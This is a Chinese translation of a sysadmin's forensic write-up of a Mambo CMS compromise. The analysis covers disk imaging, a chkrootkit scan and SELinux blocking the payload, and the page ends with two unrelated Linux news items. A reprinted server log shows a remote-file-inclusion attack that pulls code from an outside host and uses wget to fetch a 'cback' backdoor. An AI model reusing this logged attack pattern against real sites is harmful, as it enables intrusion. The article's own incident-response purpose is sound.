为了尽可能安全地运行安全分析工具, 你需要在可信赖的连网主机(与生产网络断开)上来分析入侵. 这样一来, 任何存在的攻击程序将不会攻击网络中的其它机器, 而且入侵者也没有办法通过其它主机来截获您的分析信息. 在分析入侵的时候, 最好不要使用系统做其它的事情, 可能的话制做一张拯救盘. 虽然这些准备工作会消耗您的大多时间, 但是一旦问题出现, 你将能尽快恢复, 而且也可以有效的阻止问题的扩散.

最好是把整个磁盘的数据都拷贝到一个可移动的硬盘里面. 你可以使用下面的命令完成拷贝:

# dd if=/dev/hda1 of=/mnt/removable-drive/disk.img bs=512k

然后加载磁盘, 你可以使用loop设备方式来分析备份数据(参考资源栏目的”Linux磁盘镜像). 虽然分析原有的系统可以节省很多时间, 但是这样做会更加保险, 更方便于取证.

在理想的世界中, 你可能会在攻击成功后来做这些事情. 然而有时候你必须考虑的问题的严重程度, 平衡好您拥有的时间和资源.

解决攻击问题

入侵者进入到系统后很有可能去修改apache用户可以访问和修改的文件, 这可能包括Mambo的PHP配置文件(其中包括MySQL数据库的用户名和密码). 我修改了数据库密码, 以防止入侵者使用它获得更大的用户权限.

我很幸运, 因为这只是一次测试安装. 为了防止以后的攻击, 我彻底删除了Mamboo整个程序. 然后我尝试安装最新的软件.

当系统上用户的帐户被盗后, 你将会面临着风险: 攻击者随时可能会获取超级帐户root的密码. 如果攻击者得到了root帐户, 数据恢复将会变的越加困难. 很多时候, 你都需要重新安装操作系统(注意使用完整安全的系统安装来源), 有选择地审计和恢复软件配置. 获得root权限的攻击者通常会在您不经意的时候安装rootkit程序, 它能很好的隐藏自己. 而且能够提供远程控制后门或者其它的恶意功能. 不过您可以使用一个叫做chkrootkit的程序(见chkrootkit.org网站), 它能帮助扫描活动的rootkit程序. 列表6显示了在目标主机上以非显示方式运行chkrootkit的屏幕输出结果.

列表6. chkrootkit输出

# chkrootkit -q
/usr/lib/firefox-1.0.4/chrome/.reregchrome
/usr/lib/firefox-1.0.6/chrome/.reregchrome
/usr/lib/jvm/java-1.4.2-ibm-1.4.2.3/jre/.systemPrefs
/usr/lib/jvm/java-1.4.2-ibm-1.4.2.3/jre/.systemPrefs/
.system.lock
/usr/lib/jvm/java-1.4.2-ibm-1.4.2.3/jre/.systemPrefs/
.systemRootModFile
/usr/lib/firefox-1.0.8/chrome/.reregchrome
/usr/lib/firefox-1.0.7/chrome/.reregchrome
/usr/lib/perl5/5.8.5/i386-linux-thread-multi/.packlist
/usr/lib/perl5/vendor_perl/5.8.5/i386-linux-thread-multi/
auto/mod_perl/.packlist
/usr/lib/jvm/java-1.4.2-ibm-1.4.2.3/jre/.systemPrefs
INFECTED (PORTS: 465)

chkrootkit程序用于检查和分析磁盘上受感染的文件, rookits和病毒通常就寄生在这些文件的背后. chkrootkit能够对隐藏文件及恶意软件使用的服务端口进行警告. 上面快速的检查揭露了所有的隐藏文件, 列出的这些隐藏文件不会对系统造成丝毫影响. “INFECTED(已感染)警告465号端口是一个错误的提示, 因为计算机上运行的web服务器缺省都使用465端口提供https服务. 在本实例中, 分析chkrootkit输出没有揭露真正的rootkit问题. 但是当您知道攻击者已经突破了您的攻击防线, 运行chkrootkit能帮助你获得有用的额外信息, 甚至是检查结果没有提供任何确切的结果.

好消息

在攻击过程中, 如果服务器运行了SELinux并打开了目标策略. 审计日志中最初的警告信息都是存取拒绝消息. Web服务器的错误日志提供了更多详细的注射shell代码的输出信息, 包括wget会话和wget尝试运行产生的存取拒绝消息, 见列表7.

列表7. Web服务器错误日志: 显示攻击跟踪信息

[Thu May 04 07:52:24 2006] [error] [client 10.9.233.25]
File does not exist: /var/www/html/mambo
[client 10.9.233.25] PHP Warning:
main(http://ess.trix.net/therules.dat):
failed to open stream: HTTP
request failed! HTTP/1.1 404 Not Found\r\n in
http://172.16.31.57/cmd.gif?/includes/HTML_toolbar.php on line 13
[client 10.9.233.25] PHP Warning: main(): Failed opening
‘http://ess.trix.net/therules.dat’ for inclusion
(include_path=’.:/usr/share/pear’) in
http://172.16.31.57/cmd.gif?/includes/HTML_toolbar.php on line 13
[client 10.9.233.25] PHP Notice: Undefined variable: pro4 in
http://172.16.31.57/cmd.gif?/includes/HTML_toolbar.php on line 69
[ …output trimmed ]
[client 10.9.233.25] PHP Notice: Undefined variable:
SERVER_SOFTWARE in
http://172.16.31.57/cmd.gif?/includes/HTML_toolbar.php on line 112
[client 10.9.233.25] PHP Notice: Undefined variable:
SERVER_VERSION in
http://172.16.31.57/cmd.gif?/includes/HTML_toolbar.php on line 112
–07:52:24– http://172.16.31.57/cback
=> `cback’
Connecting to 172.16.31.57:80… connected.
HTTP request sent, awaiting response… [Thu May 04 07:52:25 2006]
[error] [client 10.9.233.25] File does not exist: /var/www/html/cvs
200 OK
Length: 13,901 (14K) [text/plain]
0K ………. … 100% 110.90
KB/s
07:52:27 (110.90 KB/s) - `cback’ saved [13901/13901]
sh: ./cback: Permission denied
[client 10.9.233.25] PHP Notice: Undefined variable: ch_msg in
http://172.16.31.57/cmd.gif?/includes/HTML_toolbar.php on line 202
[ …output trimmed…]
[client 10.9.233.25] PHP Fatal error: Cannot redeclare safemode()
(previously declared in
http://172.16.31.57/cmd.gif?/includes/HTML_toolbar.php:129) in
http://172.16.31.57/cmd.gif?/includes/footer.php on line 129

SELinux能够防止cback的执行, 在病毒第二阶段保护目标主机.

新的Mambo版本关闭了攻击者能够利用的漏洞, 所以我立即安装了新的Mambo版本.

经验教训

许多工具都需要分析攻击者是否已经控制了Linux操作系统的核心部分. 通过现代搜索引擎的强大搜索能力和对公众开放的漏洞信息, 你可以经常确定一个好的方案来防止恶意者的攻击.

在很多时候您在连网主机上测试安装源代码开放的程序, 这些程序被暴露在可以公开访问的连网计算机上. 而且测试安装程序通常都位于虚拟主机的Web服务器根目录下面, 这样为攻击者留下了后门.

许多基于PHP的系统在安装说明中都清楚的提示: 把软件解压缩到web服务器的根目录, 然后修改一些配置文件. 你不可能经常使用同样干净的操作系统安装PHP程序, 而且每一个安装都使用不同的PHP模版. 在安装Mamboo和攻击之间将会有11个月的时间, 在这其间我根本上不会更新软件.

建议定期使用yum或者apt-get更新Mambo程序. 当我开始分析Mambo的时候, 我没有发现它的RPM包. 虽然第三方的RPM包已经存在. 操作系统组织和软件作者需要通过更好的协作来提供基于web方式自动软件更新.

SELinux真的节省了我的时间, 而且可以防止攻击程序的运行. 如果没有SELinux的保护, 攻击者很有可能获得了主机的root权限, 我将需要花费更多的时间来分析和进行数据恢复.

资源

SELinux: www.nsa.gov/selinux

Mambo: www.mamboserver.com

Red Hat SELinux向导
http://www.redhat.com/docs/manuals/enterprise/RHEL-4-Manual/selinux-guide

ComputerWorld上介绍Mambo病毒的文章:
http://www.computerworld.com/securitytopics/security/story/0,10801,108868,00.html?source=x73

Outpost24上介绍Mambo病毒的文章:
http://www.outpost24.com/ops/delta/FrameIndex.jsp…

F-Secure上的病毒报道:
http://www.f-secure.com/v-descs/mare_d.shtml

F-Secure上的Mambo漏洞报道:
http://archives.neohapsis.com/archives/bugtraq/2006-02/0463.html

CVE漏洞库: www.cve.mitre.org

CVE漏洞库中的Mambo报道:
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3738
Linux磁盘镜像
http://www.mega-tokyo.com/osfaq/Disk%20Images%20Under%20Linux

获取Mambo RPM软件包:
http://dag.wieers.com/packages/mambo

Richard Bullington-McGuire是PKR互连网络公司的管理合作伙伴, PKR位于美国维吉尼亚州的阿林顿市, 公司专注于Linux, 开源\和Java. Richard也创建了Obscure组织, 一个通过技术促进创造和社区的非赢利性组织. 他从1994年开始就是一名Linux的系统管理员. 你可以通过电邮rbulling@pkrinternet.com与Richard取得联系.

Linux内核主要维护者Andrew Morton说, 不要期望OpenSolaris的主要功能将会出现在Linux内核中.

在今年的LinuxWorld主题演讲中, Andrew Morton清楚地说到: 前OSDL CTO和Debian联合创始人IAN Murdock加入到SUN公司的操作系统平台组织将不会引起开源版本的Solaris Unix和Linux进行整合.

当回答一个在场者有关”是否可能将整合Solaris最显著的功能到Linux内核当中的问题时, Morton直接说到. “OpenSolaris的存在是一个很大的羞耻, 他们应当终止改项目. 这让人感到很失望, Sun公司犯了一个错误.”

Morton说这些功能包括 — Zones, ZFS 或 DTrace都将不可能整合到Linux内核中, 因为Sun拒绝采用GPL协议. ZFS许可证不与GPL协议兼容. SystemTAP在完成少数几项工作后将能实现DTrace的所有功能.

Morton也说到他没有看到很多人使用Sun的OpenSolaris. “我很少听到有关OpenSolaris, 没有人会认真考虑使用OpenSolaris.”

也许Sun的Indiana项目正在发生改变, 也许没有.

英文原文:
Morton: no merging of OpenSolaris with Linux

KVM开发者社区将举办第一届KVM论坛会议, 论坛的目的是聚集开发者, 测试者及其它技术人员来共同讨论今日KVM的状况. 我们也将会勾画KVM未来的开发路线图, 应对开发挑战, 达成共同开发将采用的开发模式.

论坛详情:

2007年8月29-31日
Loew’s Ventana Canyon Resort
Tucson, Arizona

论坛网址:
http://www.qumranet.com/KVMForum2007.php